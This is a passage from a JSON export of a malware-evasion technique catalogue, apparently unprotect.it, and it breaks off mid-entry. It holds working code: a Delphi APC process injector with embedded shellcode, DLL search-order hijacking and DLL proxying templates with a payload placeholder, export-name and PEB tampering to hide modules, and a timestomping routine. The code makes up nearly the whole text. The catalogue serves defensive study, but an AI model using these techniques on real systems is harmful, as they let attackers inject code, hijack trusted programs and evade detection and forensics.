"plain_code": "// Support both x86-32 and x86-64\r\n\r\nprogram APCInjector;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n System.SysUtils,\r\n WinAPI.Messages,\r\n WinAPI.Windows;\r\n\r\ntype\r\n EWindowsException = class(Exception)\r\n private\r\n FLastError : Integer;\r\n public\r\n {@C}\r\n constructor Create(const WinAPI : String); overload;\r\n\r\n {@G}\r\n property LastError : Integer read FLastError;\r\n end;\r\n\r\n\r\nconst STATUS_SUCCESS = NTSTATUS($0);\r\n THREAD_SET_CONTEXT = $10;\r\n THREAD_SUSPEND_RESUME = $2;\r\n ViewShare = 1;\r\n ViewUnmap = 2;\r\n\r\ntype\r\n SECTION_INHERIT = ViewShare..ViewUnmap;\r\n\r\n ARCH_ULONG = {$IFDEF WIN64} ULONG64 {$ELSE} ULONG {$ENDIF};\r\n ARCH_PULONG = {$IFDEF WIN64} PULONG64 {$ELSE} PULONG {$ENDIF};\r\n\r\n function NtCreateSection(\r\n SectionHandle : PHandle;\r\n DesiredAccess : ACCESS_MASK;\r\n ObjectAttributes : Pointer;\r\n SectionSize : PLargeInteger;\r\n Protect : ULONG;\r\n Attributes : ULONG;\r\n FileHandle : THandle\r\n ): NTSTATUS; stdcall; external 'ntdll.dll';\r\n\r\n function NtMapViewOfSection(\r\n SectionHandle : THandle;\r\n ProcessHandle : THandle;\r\n BaseAddress : PPVOID;\r\n ZeroBits : ARCH_ULONG;\r\n CommitSize : ARCH_ULONG;\r\n SectionOffset : PLargeInteger;\r\n ViewSize : ARCH_PULONG;\r\n InheritDisposition : SECTION_INHERIT;\r\n AllocationType : ARCH_ULONG;\r\n Protect : ARCH_ULONG\r\n ): NTSTATUS; stdcall; external 'ntdll.dll';\r\n\r\n function NtUnmapViewOfSection(\r\n ProcessHandle : THandle;\r\n BaseAddress : PVOID\r\n ): NTSTATUS; stdcall; external 'ntdll.dll';\r\n\r\n function NtClose(\r\n Handle : THandle\r\n ): NTSTATUS; stdcall; external 'ntdll.dll';\r\n\r\n function NtTestAlert(): DWORD; stdcall; external 'ntdll.dll';\r\n\r\n function OpenThread(\r\n dwDesiredAccess : DWORD;\r\n bInheritHandle : BOOL;\r\n dwThreadId : DWORD\r\n ): DWORD; stdcall; external 'kernel32.dll';\r\n\r\n\r\nconstructor EWindowsException.Create(const WinAPI : String);\r\nvar AFormatedMessage : String;\r\nbegin\r\n FLastError := GetLastError();\r\n\r\n AFormatedMessage := Format('___%s: last_err=%d, last_err_msg=\"%s\".', [\r\n WinAPI,\r\n FLastError,\r\n SysErrorMessage(FLastError)\r\n ]);\r\n\r\n ///\r\n inherited Create(AFormatedMessage);\r\nend;\r\n\r\nvar // hWindow : THandle;\r\n // AProcessId : Cardinal;\r\n // AThreadId : Integer;\r\n hThread : THandle;\r\n // hRemoteProcess : THandle;\r\n pRemotePayloadAddress : Pointer;\r\n hProcess : THandle;\r\n AStartupInfo : TStartupInfo;\r\n AProcessInfo : TProcessInformation;\r\n\r\n {$IFDEF WIN64}\r\n // Execute a messagebox in target process (x86-64)\r\n const PAYLOAD : array[0..284-1] of byte = (\r\n $fc, $48, $81, $e4, $f0, $ff, $ff, $ff, $e8, $d0, $00, $00, $00, $41, $51,\r\n $41, $50, $52, $51, $56, $48, $31, $d2, $65, $48, $8b, $52, $60, $3e, $48,\r\n $8b, $52, $18, $3e, $48, $8b, $52, $20, $3e, $48, $8b, $72, $50, $3e, $48,\r\n $0f, $b7, $4a, $4a, $4d, $31, $c9, $48, $31, $c0, $ac, $3c, $61, $7c, $02,\r\n $2c, $20, $41, $c1, $c9, $0d, $41, $01, $c1, $e2, $ed, $52, $41, $51, $3e,\r\n $48, $8b, $52, $20, $3e, $8b, $42, $3c, $48, $01, $d0, $3e, $8b, $80, $88,\r\n $00, $00, $00, $48, $85, $c0, $74, $6f, $48, $01, $d0, $50, $3e, $8b, $48,\r\n $18, $3e, $44, $8b, $40, $20, $49, $01, $d0, $e3, $5c, $48, $ff, $c9, $3e,\r\n $41, $8b, $34, $88, $48, $01, $d6, $4d, $31, $c9, $48, $31, $c0, $ac, $41,\r\n $c1, $c9, $0d, $41, $01, $c1, $38, $e0, $75, $f1, $3e, $4c, $03, $4c, $24,\r\n $08, $45, $39, $d1, $75, $d6, $58, $3e, $44, $8b, $40, $24, $49, $01, $d0,\r\n $66, $3e, $41, $8b, $0c, $48, $3e, $44, $8b, $40, $1c, $49, $01, $d0, $3e,\r\n $41, $8b, $04, $88, $48, $01, $d0, $41, $58, $41, $58, $5e, $59, $5a, $41,\r\n $58, $41, $59, $41, $5a, $48, $83, $ec, $20, $41, $52, $ff, $e0, $58, $41,\r\n $59, $5a, $3e, $48, $8b, $12, $e9, $49, $ff, $ff, $ff, $5d, $49, $c7, $c1,\r\n $30, $00, $00, $00, $3e, $48, $8d, $95, $fe, $00, $00, $00, $3e, $4c, $8d,\r\n $85, $0b, $01, $00, $00, $48, $31, $c9, $41, $ba, $45, $83, $56, $07, $ff,\r\n $d5, $48, $31, $c9, $41, $ba, $f0, $b5, $a2, $56, $ff, $d5, $48, $65, $6c,\r\n $6c, $6f, $2c, $20, $57, $6f, $72, $6c, $64, $00, $42, $6f, $6f, $00\r\n );\r\n\r\n {$ELSE}\r\n // Execute a messagebox in target process (x86-32)\r\n const PAYLOAD : array[0..236-1] of byte = (\r\n $d9, $eb, $9b, $d9, $74, $24, $f4, $31, $d2, $b2, $77, $31, $c9, $64, $8b,\r\n $71, $30, $8b, $76, $0c, $8b, $76, $1c, $8b, $46, $08, $8b, $7e, $20, $8b,\r\n $36, $38, $4f, $18, $75, $f3, $59, $01, $d1, $ff, $e1, $60, $8b, $6c, $24,\r\n $24, $8b, $45, $3c, $8b, $54, $28, $78, $01, $ea, $8b, $4a, $18, $8b, $5a,\r\n $20, $01, $eb, $e3, $34, $49, $8b, $34, $8b, $01, $ee, $31, $ff, $31, $c0,\r\n $fc, $ac, $84, $c0, $74, $07, $c1, $cf, $0d, $01, $c7, $eb, $f4, $3b, $7c,\r\n $24, $28, $75, $e1, $8b, $5a, $24, $01, $eb, $66, $8b, $0c, $4b, $8b, $5a,\r\n $1c, $01, $eb, $8b, $04, $8b, $01, $e8, $89, $44, $24, $1c, $61, $c3, $b2,\r\n $04, $29, $d4, $89, $e5, $89, $c2, $68, $8e, $4e, $0e, $ec, $52, $e8, $9f,\r\n $ff, $ff, $ff, $89, $45, $04, $68, $6c, $6c, $20, $41, $68, $33, $32, $2e,\r\n $64, $68, $75, $73, $65, $72, $30, $db, $88, $5c, $24, $0a, $89, $e6, $56,\r\n $ff, $55, $04, $89, $c2, $50, $bb, $a8, $a2, $4d, $bc, $87, $1c, $24, $52,\r\n $e8, $70, $ff, $ff, $ff, $68, $42, $6f, $6f, $58, $31, $db, $88, $5c, $24,\r\n $03, $89, $e3, $68, $58, $20, $20, $20, $68, $6f, $72, $6c, $64, $68, $6f,\r\n $2c, $20, $57, $68, $48, $65, $6c, $6c, $31, $c9, $88, $4c, $24, $0c, $89,\r\n $e1, $31, $d2, $6a, $30, $53, $51, $52, $ff, $d0, $90\r\n );\r\n {$ENDIF}\r\n\r\n\r\n{ Inject_WriteProcessMemory\r\n This method use the classic WriteProcessMemory method to inject our payload to remote process }\r\nfunction Inject_WriteProcessMemory(const hProcess : THandle; const pBuffer : PVOID; const ABufferSize : Cardinal) : Pointer;\r\nvar ABytesWritten : SIZE_T;\r\n pAddress : Pointer;\r\nbegin\r\n result := nil;\r\n ///\r\n\r\n if not Assigned(pBuffer) or (AbufferSize = 0) then\r\n exit();\r\n\r\n pAddress := VirtualAllocEx(hProcess, nil, ABufferSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n if not Assigned(pAddress) then\r\n raise EWindowsException.Create('VirtualAllocEx');\r\n ///\r\n\r\n if not WriteProcessMemory(hProcess, pAddress, pBuffer, ABufferSize, ABytesWritten) then\r\n raise EWindowsException.Create('WriteProcessMemory');\r\n ///\r\n\r\n result := pAddress;\r\nend;\r\n\r\nfunction MapViewOfSection(const ASectionHandle, hProcess : THandle; const ASectionSize : ULONG; const AInherit : SECTION_INHERIT) : Pointer;\r\nvar ANTStatus : NTSTATUS;\r\n pSectionAddress : Pointer;\r\nbegin\r\n pSectionAddress := nil;\r\n\r\n ANTStatus := NtMapViewOfSection(\r\n ASectionHandle,\r\n hProcess,\r\n @pSectionAddress,\r\n 0,\r\n 0,\r\n nil,\r\n @ASectionSize,\r\n AInherit,\r\n 0,\r\n PAGE_EXECUTE_READWRITE\r\n );\r\n\r\n if ANTStatus <> STATUS_SUCCESS then\r\n raise Exception.Create(Format('NtMapViewOfSection failed, NTStatus=[%d]', [ANTStatus]));\r\n\r\n ///\r\n result := pSectionAddress;\r\nend;\r\n\r\n{ Inject_SharedSection\r\n This method used a shared section to inject our payload to a remote process }\r\nfunction Inject_SharedSection(const hProcess : THandle; const pBuffer : PVOID; const ABufferSize : Cardinal) : Pointer;\r\nvar ANTStatus : NTSTATUS;\r\n ASectionHandle : THandle;\r\n pLocalSectionAddress : Pointer;\r\n pRemoteSectionAddress : Pointer;\r\n ASectionSize : TLargeInteger;\r\nbegin\r\n result := nil;\r\n ///\r\n\r\n ASectionSize := ABufferSize;\r\n\r\n ASectionHandle := 0;\r\n pLocalSectionAddress := nil;\r\n try\r\n // Create a new memory section\r\n ANTStatus := NtCreateSection(\r\n @ASectionHandle,\r\n SECTION_MAP_READ or SECTION_MAP_WRITE or SECTION_MAP_EXECUTE,\r\n nil,\r\n @ASectionSize,\r\n PAGE_EXECUTE_READWRITE,\r\n SEC_COMMIT,\r\n 0\r\n );\r\n\r\n if ANTStatus <> STATUS_SUCCESS then\r\n raise Exception.Create(Format('NtCreateSection failed, NTStatus=[%d]', [ANTStatus]));\r\n ///\r\n\r\n // Map new section and share it with target process\r\n pLocalSectionAddress := MapViewOfSection(ASectionHandle, GetCurrentProcess(), ABufferSize, ViewUnmap);\r\n pRemoteSectionAddress := MapViewOfSection(ASectionHandle, hProcess, ABufferSize, ViewShare);\r\n\r\n // Copy our payload to our new section\r\n CopyMemory(pLocalSectionAddress, pBuffer, ABufferSize);\r\n finally\r\n // Unmap section for current process\r\n if Assigned(pLocalSectionAddress) then\r\n NtUnmapViewOfSection(GetCurrentProcess(), pLocalSectionAddress);\r\n\r\n // Close section for our current process\r\n if ASectionHandle <> 0 then\r\n NtClose(ASectionHandle);\r\n end;\r\n\r\n ///\r\n result := pRemoteSectionAddress; // Return payload location in remote process\r\nend;\r\n\r\nbegin\r\n try\r\n (*\r\n // Bellow code demonstrate how to use FindWindow + GetWindowThreadProcessId and\r\n // OpenProcess to achieve the same result in an existing process.\r\n // Bellow method when possible is interesting to avoid iterating on threads.\r\n\r\n // Get target process handle from its window handle\r\n hWindow := FindWindowW(nil, 'PEView - Untitled');\r\n if hWindow = 0 then\r\n raise Exception.Create('Could not find window handle.');\r\n ///\r\n\r\n // Get target process identifier from its window handle\r\n AThreadId := GetWindowThreadProcessId(hWindow, AProcessId);\r\n if AProcessId = 0 then\r\n raise EWindowsException.Create('GetWindowThreadProcessId');\r\n ///\r\n\r\n // Open target process\r\n hRemoteProcess := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_WRITE, false, AProcessId);\r\n if hRemoteProcess = 0 then\r\n raise EWindowsException.Create('OpenProcess');\r\n\r\n // hThread := OpenThread(THREAD_SET_CONTEXT or THREAD_SUSPEND_RESUME, False, AProcessInfo.hThread);\r\n // if hThread = 0 then\r\n // raise EWindowsException.Create('OpenThread');\r\n *)\r\n\r\n ZeroMemory(@AProcessInfo, SizeOf(TProcessInformation));\r\n ZeroMemory(@AStartupInfo, Sizeof(TStartupInfo));\r\n\r\n AStartupInfo.cb := SizeOf(TStartupInfo);\r\n AStartupInfo.wShowWindow := SW_HIDE;\r\n AStartupInfo.dwFlags := (STARTF_USESHOWWINDOW);\r\n\r\n if not CreateProcessW(\r\n 'c:\\Windows\\notepad.exe', // Edit here accordingly\r\n nil, // Edit here accordingly\r\n nil,\r\n nil,\r\n False,\r\n CREATE_SUSPENDED,\r\n nil,\r\n nil,\r\n AStartupInfo,\r\n AProcessInfo\r\n ) then\r\n raise EWindowsException.Create('CreateProcessW');\r\n try\r\n\r\n try\r\n // Alternatively you can comment \"Inject_SharedSection\" and use \"Inject_WriteProcessMemory\" instead.\r\n pRemotePayloadAddress := Inject_SharedSection(AProcessInfo.hProcess, @PAYLOAD, Length(PAYLOAD));\r\n // pRemotePayloadAddress := Inject_WriteProcessMemory(AProcessInfo.hProcess, @PAYLOAD, Length(PAYLOAD));\r\n\r\n if not Assigned(pRemotePayloadAddress) then\r\n raise Exception.Create('Could not inject buffer to remote process.');\r\n\r\n if not QueueUserAPC(pRemotePayloadAddress, AProcessInfo.hThread, 0) then\r\n raise EWindowsException.Create('QueueUserAPC');\r\n\r\n ResumeThread(AProcessInfo.hThread);\r\n finally\r\n CloseHandle(hThread);\r\n end;\r\n finally\r\n CloseHandle(AProcessInfo.hThread);\r\n end;\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\nend."
},
{
"id": 122,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 18,
"name": "Alex Schwarz",
"email": null,
"linkedin": "https://www.linkedin.com/in/alex-schwarz",
"twitter": null,
"website": null,
"github": "https://github.com/AlSch092"
},
"technique": "https://unprotect.it/api/techniques/221/?format=api",
"description": "",
"plain_code": "#pragma comment(linker,\"/export:FuncA=DLLExport.FunctionA,@1\") \r\n\r\n#include <iostream>\r\n#include <Windows.h>\r\n#include <ImageHlp.h>\r\n#pragma comment(lib, \"ImageHlp\")\r\n\r\nusing namespace std;\r\n\r\nbool ModifyDLLExportName(string dllName, string functionName, string newName)\r\n{\r\n\tDWORD* dNameRVAs(0);\r\n\t_IMAGE_EXPORT_DIRECTORY* ImageExportDirectory;\r\n\tunsigned long cDirSize;\r\n\t_LOADED_IMAGE LoadedImage;\r\n\tstring sName;\r\n\r\n\tif (MapAndLoad(dllName.c_str(), NULL, &LoadedImage, TRUE, TRUE))\r\n\t{\r\n\t\tImageExportDirectory = (_IMAGE_EXPORT_DIRECTORY*)ImageDirectoryEntryToData(LoadedImage.MappedAddress, false, IMAGE_DIRECTORY_ENTRY_EXPORT, &cDirSize);\r\n\r\n\t\tif (ImageExportDirectory != NULL)\r\n\t\t{\r\n\r\n\t\t\tdNameRVAs = (DWORD*)ImageRvaToVa(LoadedImage.FileHeader, LoadedImage.MappedAddress, ImageExportDirectory->AddressOfNames, NULL);\r\n\r\n\t\t\tfor (size_t i = 0; i < ImageExportDirectory->NumberOfNames; i++)\r\n\t\t\t{\r\n\t\t\t\tsName = (char*)ImageRvaToVa(LoadedImage.FileHeader, LoadedImage.MappedAddress, dNameRVAs[i], NULL);\r\n\r\n\t\t\t\tif (strcmp(functionName.c_str(), sName.c_str()) == 0)\r\n\t\t\t\t{\r\n\t\t\t\t\tUINT64 funcName_Address = (UINT64)GetModuleHandleA(dllName.c_str()) + dNameRVAs[i];\r\n\r\n\t\t\t\t\tDWORD oldProt = 0;\r\n\r\n\t\t\t\t\tif (!VirtualProtect((LPVOID)funcName_Address, 1024, PAGE_EXECUTE_READWRITE, &oldProt))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"VirtualProtect failed: %d\\n\", GetLastError());\r\n\t\t\t\t\t\treturn false;\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy_s((char*)funcName_Address, 100, newName.c_str());\r\n\t\t\t\t\t\tprintf(\"Copied over export function name..\\n\");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tUnMapAndLoad(&LoadedImage);\r\n\t}\r\n\r\n\treturn true;\r\n}\r\n\r\n\r\nint main(void)\r\n{\r\n\t//user-provided DLL Tests\r\n\tLoadLibraryA(\"DllExport.dll\");\r\n\r\n\tDWORD addr_exe = (DWORD)GetProcAddress(GetModuleHandleA(\"ModifyExports.exe\"), \"FuncA\"); //using linker statement at top\r\n\tprintf(\"Addr: %x\\n\", addr_exe);\r\n\r\n\tDWORD addr_dll = (DWORD)GetProcAddress(GetModuleHandleA(\"DllExport.dll\"), \"FunctionA\"); //returns same value as above line (address of DllExport.FunctionA)\r\n\tprintf(\"Addr: %x\\n\", addr_dll);\r\n\r\n\tModifyDLLExportName(\"DllExport.dll\", \"FunctionA\", \"FunctionB\");\r\n\tDWORD addr_dll_B = (DWORD)GetProcAddress(GetModuleHandleA(\"DllExport.dll\"), \"FunctionB\"); //returns same value as above, thus looking up FunctionB gives us FunctionA.\r\n\tprintf(\"Addr: %x\\n\", addr_dll_B);\r\n\r\n\t//WINAPI Tests\r\n\r\n\tDWORD addr = (DWORD)GetProcAddress(GetModuleHandleA(\"kernel32.dll\"), \"VirtualAlloc\"); //this will return 0, as the above line changed the export's name.\r\n\tprintf(\"Addr: %x\\n\", addr);\r\n\tModifyDLLExportName(\"kernel32.dll\", \"VirtualAlloc\", \"VirtualQuery\");\r\n\taddr = (DWORD)GetProcAddress(GetModuleHandleA(\"kernel32.dll\"), \"VirtualAlloc\"); //returns 0\r\n\tprintf(\"Addr: %x\\n\", addr);\r\n\taddr = (DWORD)GetProcAddress(GetModuleHandleA(\"kernel32.dll\"), \"VirtualQuery\"); //now returns the address of VirtualAlloc, not VirtualQuery!\r\n\tprintf(\"Addr: %x\\n\", addr);\r\n\tsystem(\"pause\");\r\n\treturn 0;\r\n}"
},
{
"id": 121,
"language": {
"id": 9,
"label": "C#",
"code_class": "csharp"
},
"author": {
"id": 1,
"name": "Jean-Pierre LESUEUR",
"email": "jplesueur@phrozen.io",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/165/?format=api",
"description": "This tiny code snippet demonstrate the principle of file time stomping.\r\n\r\nSteps:\r\n\r\n* Enumerate files in current directory (excluding the target file).\r\n* Sort enumerated files by modification date.\r\n* Takes the most recent file and apply its **File Creation Date**, **File Last Modification** and **File Last Access** to our target file.\r\n\r\nAdditional information:\r\n\r\n* Supports relative target file. \r\n* If no files lives inside the current directory, then current directory (parent folder) date information are used.\r\n* If no files lives inside the current directory and current directory is a root path, then timestomp procedure fails.",
"plain_code": "using System;\r\nusing System.IO;\r\n\r\nvoid timeStomp(String targetFile)\r\n{\r\n targetFile = Path.GetFullPath(targetFile);\r\n\r\n if (!File.Exists(targetFile))\r\n {\r\n throw new FileNotFoundException(String.Format(\"File \\\"{0}\\\" does not exists.\", targetFile));\r\n }\r\n\r\n string? parentDirectory = Path.GetDirectoryName(targetFile);\r\n bool isInRoot = false;\r\n\r\n if (parentDirectory == null)\r\n {\r\n parentDirectory = Directory.GetDirectoryRoot(targetFile);\r\n isInRoot = true;\r\n }\r\n\r\n var options = new EnumerationOptions()\r\n {\r\n IgnoreInaccessible = true,\r\n RecurseSubdirectories = true,\r\n AttributesToSkip = FileAttributes.System | FileAttributes.Hidden,\r\n };\r\n\r\n var candidates = new DirectoryInfo(parentDirectory)\r\n .GetFiles(\"*.*\", options)\r\n .Where(file => !file.FullName.Equals(targetFile, StringComparison.OrdinalIgnoreCase))\r\n .OrderByDescending(file => file.LastWriteTime)\r\n .ToList();\r\n\r\n FileInfo? candidate = null; \r\n \r\n if (candidates.Count > 0)\r\n {\r\n candidate = candidates.First();\r\n } \r\n else if (!isInRoot)\r\n {\r\n candidate = new FileInfo(parentDirectory);\r\n }\r\n\r\n if (candidate != null)\r\n {\r\n Console.WriteLine(string.Format(\"Using \\\"{0}\\\" file for timeStomping...\", candidate));\r\n\r\n File.SetCreationTime(targetFile, candidate.CreationTime);\r\n File.SetLastAccessTime(targetFile, candidate.LastAccessTime);\r\n File.SetLastWriteTime(targetFile, candidate.LastWriteTime);\r\n\r\n Console.WriteLine(\"Done.\");\r\n }\r\n else\r\n {\r\n throw new Exception(\"Could not find suitable existing file for timeStomping...\");\r\n }\r\n}\r\n\r\ntimeStomp(\"G:\\\\test\\\\sub7.exe\");"
},
{
"id": 120,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 19,
"name": "Sh0ckFR",
"email": null,
"linkedin": "https://www.linkedin.com/in/yann-f/",
"twitter": "https://twitter.com/Sh0ckFR",
"website": "https://sh0ckfr.com",
"github": null
},
"technique": "https://unprotect.it/api/techniques/220/?format=api",
"description": "DLL Search Order Hijacking via DnsFreeConfigStructure function in the DLL DNSAPI.dll of the executable nslookup.exe.",
"plain_code": "#include <windows.h>\r\n\r\nint Main() {\r\n MessageBoxW(0, L\"DLL Search Order Hijacking is present\", L\"DLL Search Order Hijacking\", 0);\r\n return 1;\r\n}\r\n\r\nBOOL APIENTRY DllMain(HMODULE hModule,\r\n DWORD ul_reason_for_call,\r\n LPVOID lpReserved\r\n)\r\n{\r\n switch (ul_reason_for_call)\r\n {\r\n case DLL_PROCESS_ATTACH:\r\n CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)Main, NULL, NULL, NULL);\r\n break;\r\n case DLL_THREAD_ATTACH:\r\n case DLL_THREAD_DETACH:\r\n case DLL_PROCESS_DETACH:\r\n break;\r\n }\r\n return TRUE;\r\n}\r\n\r\n__declspec(dllexport) void DnsFreeConfigStructure() { Main(); }"
},
{
"id": 119,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 19,
"name": "Sh0ckFR",
"email": null,
"linkedin": "https://www.linkedin.com/in/yann-f/",
"twitter": "https://twitter.com/Sh0ckFR",
"website": "https://sh0ckfr.com",
"github": null
},
"technique": "https://unprotect.it/api/techniques/219/?format=api",
"description": "DLL Proxying code via `DNSAPI.dll` on nslookup.exe, in this exemple, the original `DNSAPI.dll` file must be renamed proxy.dll and the generated dll must be named `DNSAPI.dll`.",
"plain_code": "#pragma once\r\n#pragma comment(linker,\"/export:AdaptiveTimeout_ClearInterfaceSpecificConfiguration=proxy.AdaptiveTimeout_ClearInterfaceSpecificConfiguration,@1\")\r\n#pragma comment(linker,\"/export:AdaptiveTimeout_ResetAdaptiveTimeout=proxy.AdaptiveTimeout_ResetAdaptiveTimeout,@2\")\r\n#pragma comment(linker,\"/export:AddRefQueryBlobEx=proxy.AddRefQueryBlobEx,@3\")\r\n#pragma comment(linker,\"/export:BreakRecordsIntoBlob=proxy.BreakRecordsIntoBlob,@4\")\r\n#pragma comment(linker,\"/export:Coalesce_UpdateNetVersion=proxy.Coalesce_UpdateNetVersion,@5\")\r\n#pragma comment(linker,\"/export:CombineRecordsInBlob=proxy.CombineRecordsInBlob,@6\")\r\n#pragma comment(linker,\"/export:DeRefQueryBlobEx=proxy.DeRefQueryBlobEx,@7\")\r\n...\r\n\r\nint Main()\r\n{\r\n // Your payload code.\r\n}\r\n\r\nBOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)\r\n{\r\n switch (fdwReason)\r\n {\r\n case DLL_PROCESS_ATTACH:\r\n Main();\r\n break;\r\n case DLL_THREAD_ATTACH:\r\n break;\r\n case DLL_THREAD_DETACH:\r\n break;\r\n case DLL_PROCESS_DETACH:\r\n break;\r\n }\r\n return TRUE;\r\n}"
},
{
"id": 118,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 19,
"name": "Sh0ckFR",
"email": null,
"linkedin": "https://www.linkedin.com/in/yann-f/",
"twitter": "https://twitter.com/Sh0ckFR",
"website": "https://sh0ckfr.com",
"github": null
},
"technique": "https://unprotect.it/api/techniques/219/?format=api",
"description": "Basic python script to extract all exported functions of a targeted DLL, here DNSAPI.dll used by nslookup.exe.",
"plain_code": "import pefile\r\n\r\nexported_functions = []\r\npe = pefile.PE('C:\\\\windows\\\\system32\\\\DNSAPI.dll')\r\nfor entry in pe.DIRECTORY_ENTRY_EXPORT.symbols:\r\n func = entry.name.decode('utf-8')\r\n exported_functions.append(f'#pragma comment(linker,\"/export:{func}=proxy.{func},@{entry.ordinal}\")')\r\n\r\nexported_functions = '\\n'.join(exported_functions)\r\nprint(exported_functions)"
},
{
"id": 117,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 18,
"name": "Alex Schwarz",
"email": null,
"linkedin": "https://www.linkedin.com/in/alex-schwarz",
"twitter": null,
"website": null,
"github": "https://github.com/AlSch092"
},
"technique": "https://unprotect.it/api/techniques/218/?format=api",
"description": "",
"plain_code": "#include <Windows.h>\r\n#include <Winternl.h>\r\n#include <stdint.h>\r\n\r\nbool ChangeModuleDllBase(const wchar_t* szModule, uint64_t newAddress)\r\n{\r\n\tPPEB PEB = (PPEB)__readgsqword(0x60);\r\n\t_LIST_ENTRY* f = PEB->Ldr->InMemoryOrderModuleList.Flink;\r\n\tbool Found = FALSE;\r\n\tint count = 0;\r\n\r\n\twhile (!Found && count < 256)\r\n\t{\r\n\t\tPLDR_DATA_TABLE_ENTRY dataEntry = CONTAINING_RECORD(f, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);\r\n\r\n\t\tif (wcsstr(dataEntry->FullDllName.Buffer, szModule))\r\n\t\t{\r\n\t\t\tdataEntry->DllBase = (PVOID)newAddress;\r\n\t\t\tFound = TRUE;\r\n\t\t\treturn true;\r\n\t\t}\r\n\r\n\t\tf = dataEntry->InMemoryOrderLinks.Flink;\r\n\t\tcount++;\r\n\t}\r\n\r\n\treturn false;\r\n}\r\n\r\nint main()\r\n{\r\n ChangeModuleDllBase(L\"YourProgram.exe\", 0x123456789);\r\n return 0;\r\n}"
},
{
"id": 116,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 18,
"name": "Alex Schwarz",
"email": null,
"linkedin": "https://www.linkedin.com/in/alex-schwarz",
"twitter": null,
"website": null,
"github": "https://github.com/AlSch092"
},
"technique": "https://unprotect.it/api/techniques/217/?format=api",
"description": "",
"plain_code": "// changeModuleNameRuntime.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n#define _CRT_SECURE_NO_WARNINGS\r\n\r\n#include <iostream>\r\n#include <Windows.h>\r\n#include <Winternl.h>\r\n\r\ntypedef struct _MYPEB {\r\n\tUCHAR InheritedAddressSpace;\r\n\tUCHAR ReadImageFileExecOptions;\r\n\tUCHAR BeingDebugged;\r\n\tUCHAR Spare;\r\n\tPVOID Mutant;\r\n\tPVOID ImageBaseAddress;\r\n\tPEB_LDR_DATA* Ldr;\r\n\tPRTL_USER_PROCESS_PARAMETERS ProcessParameters;\r\n\tPVOID SubSystemData;\r\n\tPVOID ProcessHeap;\r\n\tPVOID FastPebLock;\r\n\tPVOID FastPebLockRoutine;\r\n\tPVOID FastPebUnlockRoutine;\r\n\tULONG EnvironmentUpdateCount;\r\n\tPVOID* KernelCallbackTable;\r\n\tPVOID EventLogSection;\r\n\tPVOID EventLog;\r\n\tPVOID FreeList;\r\n\tULONG TlsExpansionCounter;\r\n\tPVOID TlsBitmap;\r\n\tULONG TlsBitmapBits[0x2];\r\n\tPVOID ReadOnlySharedMemoryBase;\r\n\tPVOID ReadOnlySharedMemoryHeap;\r\n\tPVOID* ReadOnlyStaticServerData;\r\n\tPVOID AnsiCodePageData;\r\n\tPVOID OemCodePageData;\r\n\tPVOID UnicodeCaseTableData;\r\n\tULONG NumberOfProcessors;\r\n\tULONG NtGlobalFlag;\r\n\tUCHAR Spare2[0x4];\r\n\tULARGE_INTEGER CriticalSectionTimeout;\r\n\tULONG HeapSegmentReserve;\r\n\tULONG HeapSegmentCommit;\r\n\tULONG HeapDeCommitTotalFreeThreshold;\r\n\tULONG HeapDeCommitFreeBlockThreshold;\r\n\tULONG NumberOfHeaps;\r\n\tULONG MaximumNumberOfHeaps;\r\n\tPVOID** ProcessHeaps;\r\n\tPVOID GdiSharedHandleTable;\r\n\tPVOID ProcessStarterHelper; //PPS_POST_PREOCESS_INIT_ROUTINE?\r\n\tPVOID GdiDCAttributeList;\r\n\tPVOID LoaderLock;\r\n\tULONG OSMajorVersion;\r\n\tULONG OSMinorVersion;\r\n\tULONG OSBuildNumber;\r\n\tULONG OSPlatformId;\r\n\tULONG ImageSubSystem;\r\n\tULONG ImageSubSystemMajorVersion;\r\n\tULONG ImageSubSystemMinorVersion;\r\n\tULONG GdiHandleBuffer[0x22];\r\n\tPVOID ProcessWindowStation;\r\n} MYPEB, * PMYPEB;\r\n\r\nvoid ChangeModuleName(wchar_t* szModule, wchar_t* newName)\r\n{\r\n\tPPEB PEB = (PPEB)__readgsqword(0x60);\r\n\t_LIST_ENTRY* f = PEB->Ldr->InMemoryOrderModuleList.Flink;\r\n\tbool Found = FALSE;\r\n\r\n\twhile (!Found)\r\n\t{\r\n\t\tPLDR_DATA_TABLE_ENTRY dataEntry = CONTAINING_RECORD(f, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);\r\n\r\n\t\tif (wcsstr(dataEntry->FullDllName.Buffer, szModule) != NULL)\r\n\t\t{\r\n\t\t\twcscpy(dataEntry->FullDllName.Buffer, newName);\r\n\t\t\tFound = TRUE;\r\n\t\t\treturn;\r\n\t\t}\r\n\r\n\t\tf = dataEntry->InMemoryOrderLinks.Flink;\r\n\t}\r\n}\r\n\r\nint main()\r\n{\r\n\tChangeModuleName((wchar_t*)L\"myApplication.exe\", (wchar_t*) L\"NEW_MODULE_NAME\"); //you can also change to a module name with no file extension if you want to hide your module \r\n}"
},
{
"id": 115,
"language": {
"id": 5,
"label": "Assembly",
"code_class": "x86asm"
},
"author": {
